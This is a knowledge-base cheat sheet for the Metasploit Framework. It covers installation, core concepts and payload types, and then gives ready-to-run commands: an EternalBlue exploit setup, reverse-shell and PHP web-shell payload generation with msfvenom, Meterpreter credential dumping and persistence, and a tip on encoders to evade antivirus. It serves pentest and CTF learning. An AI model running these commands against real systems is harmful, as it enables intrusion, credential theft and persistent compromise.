Mnemata
@sanoski/

Hacking Tools

publicKnowledge base

A collection of hacking tools

#hacking

Metasploit

Metasploit.md

Metasploit

Overview

Metasploit Framework is the world’s most widely used penetration testing platform. It provides a massive library of exploits, payloads, auxiliary modules, and post-exploitation tools in a unified CLI/GUI environment. It is the backbone of professional pentesting and CTF work.

Category

#exploitation #gaining-access #post-exploitation

Phase

Gaining Access

Developer

Originally HD Moore; now maintained by Rapid7 — metasploit.com

Editions

Edition Notes
Metasploit Framework Free, open-source, CLI-based
Metasploit Pro Commercial; adds web UI, automation, reports

Install

# Kali Linux — pre-installed
msfconsole

# Other Linux
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall && sudo ./msfinstall

Core Concepts

Term Description
Module Any piece of functionality (exploit, auxiliary, payload, etc.)
Exploit Code that takes advantage of a vulnerability
Payload Code that runs on the target after exploitation
Auxiliary Scanners, fuzzers, DoS, brute-force (no payload)
Post Post-exploitation modules (run after access is gained)
Encoder Obfuscates payloads to evade AV
Nop No-operation sled used in some exploits
LHOST Attacker IP (where reverse shells connect back to)
LPORT Attacker listening port
RHOST Remote/target host

Payload Types

Type Behavior
singles Self-contained; do one thing
stagers Tiny stub that fetches the rest of the payload
stages Full payload delivered by stager (e.g., Meterpreter)
bind Opens a port on the target; attacker connects in
reverse Target connects back to attacker (better for NAT/firewall)

Common msfconsole Commands

msfconsole                    # Start Metasploit

# Searching and selecting modules
search eternalblue            # Find modules by keyword
search type:exploit ms17-010  # Filter by type + keyword
use exploit/windows/smb/ms17_010_eternalblue
info                          # Show module details

# Configure and run
show options                  # See required settings
set RHOSTS 192.168.1.10
set LHOST 192.168.1.100
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run                           # or: exploit

# Session management
sessions -l                   # List active sessions
sessions -i 1                 # Interact with session 1
background                    # Background current session

# Database (requires postgresql)
db_nmap -sV 192.168.1.0/24   # Run Nmap, save results to DB
hosts                         # View discovered hosts
services                      # View discovered services
vulns                         # View recorded vulnerabilities

Meterpreter Quick Reference

# System
sysinfo           # OS/hostname info
getuid            # Current user
getpid            # Current process ID
ps                # List processes
migrate 1234      # Migrate to process by PID

# Filesystem
ls / pwd / cd
download file.txt /local/path
upload /local/file.txt C:\\Windows\\Temp

# Privilege escalation
getsystem         # Attempt automatic privesc
run post/multi/recon/local_exploit_suggester

# Credentials
hashdump          # Dump local password hashes
run post/windows/gather/credentials/credential_collector

# Pivoting
portfwd add -l 4444 -p 3389 -r 10.10.10.5  # Port forward

# Persistence
run post/windows/manage/persistence_exe

MSFvenom — Payload Generation

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php

# List all payloads
msfvenom -l payloads

OPSEC Notes

Metasploit exploits generate significant network noise and host artifacts. Use staged payloads and encoders to reduce AV detection. Always operate inside authorized scope — unauthorized exploitation is illegal regardless of tool used.

Related Tools

  • Nmap / Nessus / OpenVAS — Identify targets and vulns before exploiting
  • Hydra — Brute-force credentials that can be used with Metasploit modules
  • Meterpreter — The primary post-exploitation shell (built into Metasploit)
  • SQLmap — Exploits SQL injection; can chain with Metasploit
  • Netcat — Lightweight alternative for simple reverse shells

Tags

#ethical-hacking #exploitation #gaining-access #post-exploitation #meterpreter

Linked from